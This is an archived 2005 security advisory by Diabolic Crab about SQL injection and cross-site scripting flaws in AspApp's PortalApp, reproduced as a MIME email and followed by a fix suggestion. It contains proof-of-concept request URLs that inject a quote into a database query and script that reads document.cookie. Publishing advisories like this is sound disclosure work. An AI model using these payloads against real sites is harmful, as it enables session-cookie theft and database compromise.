Lucene search
K

portalApp.txt

🗓️ 29 Mar 2005 00:00:00Reported by Diabolic CrabType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Multiple sql injection and xss vulnerabilities in PortalApp. Medium severity. Proof of concept exploits provided. Vendor: AspApp. Possible fix involves input validation

Code
`This is a multi-part message in MIME format.  
  
------=_NextPart_000_0046_01C53454.58BFA8E0  
Content-Type: text/plain;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Dcrab 's Security Advisory  
http://icis.digitalparadox.org/~dcrab  
http://www.hackerscenter.com/  
  
Severity: Medium  
Title: Multiple sql injection, and xss vulnerabilities in PortalApp.  
Date: March 30, 2005  
Vendor: AspApp  
Vendor site: http://www.aspapp.com  
  
Summary:  
There are multiple sql injection, xss vulnerabilities in the PortalApp.  
  
Proof of Concept Exploits:  
  
http://localhost/ad_click.asp?banner_id=3D'SQL_INJECTION  
Microsoft JET Database Engine error '80040e14'  
  
Syntax error in string in query expression 'banner_id =3D =  
'SQL_INJECTION'.  
  
/ad_click.asp, line 14  
  
  
http://localhost/content.asp?contenttype=3D%22%3E%3Cscript%3Ealert(docume=  
nt.cookie)%3C/script%3E  
Pops cookie  
  
  
http://localhost/content.asp?do_search=3D1&keywords=3D'%3E%3Cscript%3Eale=  
rt(document.cookie)%3C/script%3E  
Pops cookie  
  
  
Possible fix: The usage of htmlspeacialchars(), mysql_escape_string(), =  
mysql_real_escape_string() and other functions for input validation =  
before passing user input to the mysql database, or before echoing data =  
on the screen, would solve these problems.  
  
Author:  
These vulnerabilties have been found and released by Diabolic Crab, =  
Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to =  
contact me regarding these vulnerabilities. You can find me at, =  
http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. =  
Lookout for my soon to come out book on Secure coding with php.  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com  
  
iQA/AwUBQkjxjyZV5e8av/DUEQJTagCeMdB58bY72TMo6mITsSHLByjCT/MAnjRM  
n0K6nk2uxIlFknfglJIoUkqq  
=3DV5fo  
-----END PGP SIGNATURE-----  
  
------=_NextPart_000_0046_01C53454.58BFA8E0  
Content-Type: text/html;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
<HTML><HEAD>  
<META http-equiv=3DContent-Type content=3D"text/html; =  
charset=3Diso-8859-1">  
<META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR>  
<STYLE></STYLE>  
</HEAD>  
<BODY bgColor=3D#ffffff><FONT face=3DArial size=3D2>  
<DIV><BR>-----BEGIN PGP SIGNED MESSAGE-----<BR>Hash: SHA1</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Dcrab 's Security Advisory<BR><A=20  
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=  
.org/~dcrab</A><BR><A=20  
href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><=  
/DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Severity:&nbsp; Medium<BR>Title: Multiple sql injection, and xss=20  
vulnerabilities in PortalApp.<BR>Date: March&nbsp; 30,&nbsp; =  
2005<BR>Vendor:=20  
AspApp<BR>Vendor site: <A=20  
href=3D"http://www.aspapp.com">http://www.aspapp.com</A></DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Summary:<BR>There are multiple sql injection, xss vulnerabilities =  
in the=20  
PortalApp.</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Proof of Concept Exploits:</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><A=20  
href=3D"http://localhost/ad_click.asp?banner_id=3D'SQL_INJECTION">http://=  
localhost/ad_click.asp?banner_id=3D'SQL_INJECTION</A><BR>Microsoft=20  
JET Database Engine error '80040e14'</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Syntax error in string in query expression 'banner_id =3D=20  
'SQL_INJECTION'.</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>/ad_click.asp, line 14</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR><A=20  
href=3D"http://localhost/content.asp?contenttype=3D%22%3E%3Cscript%3Ealer=  
t(document.cookie)%3C/script%3E">http://localhost/content.asp?contenttype=  
=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E</A><BR>Pops=20  
cookie</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR><A=20  
href=3D"http://localhost/content.asp?do_search=3D1&keywords=3D'%3E%3C=  
script%3Ealert(document.cookie)%3C/script%3E">http://localhost/content.as=  
p?do_search=3D1&keywords=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/=  
script%3E</A><BR>Pops=20  
cookie</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR>Possible fix: The usage of htmlspeacialchars(), =  
mysql_escape_string(),=20  
mysql_real_escape_string() and other functions for input validation =  
before=20  
passing user input to the mysql database, or before echoing data on the =  
screen,=20  
would solve these problems.</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Author:<BR>These vulnerabilties have been found and released by =  
Diabolic=20  
Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel =  
free to=20  
contact me regarding these vulnerabilities. You can find me at, <A=20  
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =  
or <A=20  
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=  
.org/~dcrab</A>.=20  
Lookout for my soon to come out book on Secure coding with php.</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>-----BEGIN PGP SIGNATURE-----<BR>Version: PGP 8.1 - not licensed =  
for=20  
commercial use: <A href=3D"http://www.pgp.com">www.pgp.com</A></DIV>  
<DIV>&nbsp;</DIV>  
<DIV>iQA/AwUBQkjxjyZV5e8av/DUEQJTagCeMdB58bY72TMo6mITsSHLByjCT/MAnjRM<BR>=  
n0K6nk2uxIlFknfglJIoUkqq<BR>=3DV5fo<BR>-----END=20  
PGP SIGNATURE-----<BR></FONT></DIV></BODY></HTML>  
  
------=_NextPart_000_0046_01C53454.58BFA8E0--  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation